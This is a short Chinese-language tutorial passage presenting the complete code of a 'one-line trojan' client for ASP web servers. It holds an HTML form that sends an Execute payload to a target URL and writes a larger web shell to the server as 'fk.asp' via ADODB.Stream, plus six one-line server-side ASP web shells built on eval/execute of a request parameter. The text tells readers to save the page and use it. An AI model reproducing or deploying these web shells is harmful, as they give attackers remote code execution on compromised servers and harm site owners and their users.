一:基础篇
首先我们看一下最常用的一句话木马客户端的代码
以下是代码片段: <html> <head> <title>一句话客户端</title> <style type="text/css"> <!-- body { background-color: #FFFFFF; } .lygf { border: 1px solid #660069; font-size: 12px; } --> </style> </head> <body> <table width="500" border="0" align="center" class="lygf" height="14" cellspacing="0"> <tr> <td height="1" width="794"> <form name="lygf" method="post"> <input name="add" type="text" id="add" size="97" value="http://"> <input type="submit" value="枫" onClick="this.form.action=this.form.add.value;"> <input type="hidden" name="fk" id="fk" value="Execute("Session(""fk"")=request(""*""):Execute(Session(""fk""))")"> </td> </tr> <tr> <td height="100" width="794"> <textarea name="*" cols="100" rows="9" width="45"> set lP=server.createObject("Adodb.Stream") lP.Open lP.Type=2 lP.CharSet="gb2312" lP.writetext request("lygf") lP.SaveToFile server.mappath("fk.asp"),2 lP.Close set lP=nothing response.redirect "fk.asp"</textarea> </td> </tr> <tr> <td height="1" width="794"> <textarea name="lygf" cols="100" rows="15" width="45"> 写入你的大马</textarea> </td> </tr> <tr> <td width="794" height="7"> <font color="#000000">提供六个服务端:</font> <br> 1. <%eval request("fk")%> <br> 2. <%execute request("fk")%> <br> 3. <%execute(request("fk"))%> <br> 4. <%On Error Resume Next%><%eval request("fk")%> <br> 5. <script language=VBScript runat=server>execute request("fk")</Script> <br> 6. <script language=VBScript runat=server>eval request("fk")</Script> <br> <br>By 冷月孤枫 枫客:http://fk.3355.cn/ ... t;/font><br> </td> </tr> </table> </body> </html> |
把上面的代码另存为htm的格式后就可以使用了,具体的使用说明在网页上可以看到